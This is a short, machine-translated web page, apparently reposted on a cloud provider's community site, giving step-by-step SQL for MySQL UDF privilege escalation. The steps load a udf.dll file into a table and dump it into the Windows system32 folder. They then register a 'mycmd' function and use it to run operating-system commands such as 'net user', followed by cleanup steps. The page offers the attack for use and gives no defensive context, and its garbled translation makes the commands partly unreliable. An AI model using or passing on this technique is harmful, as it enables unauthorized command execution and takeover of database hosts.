UDF manual export claim

Source: Internet
Author: User
Tags directory create

When the default UDF export fails, you can try to export the UDF manually by using the manual method, as follows:
First upload Udf.dll, connect to MySQL, and then follow the steps below to execute the SQL statement. CREATE TABLE ZZ (ABC Longblob)//Note the column type is Longblob 2.insert into ZZ values (load_file (' C:\\udf.dll ')); Uploaded udf.dll Path select * FROM ZZ to DumpFile ' C://windows//system32//udf.dll '; Import Target address MySQL 5.0 to import to the system directory Create Function mycmd returns string Soname ' Udf.dll '; Here if the exported path is C://windows//system32//udf2.dll ' can be changed back to Udf2.dll select myCMD (' Net user '); Drop function myCMD;

Delete the Udf.dll method, first delete the generated function
Drop function myCMD;

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.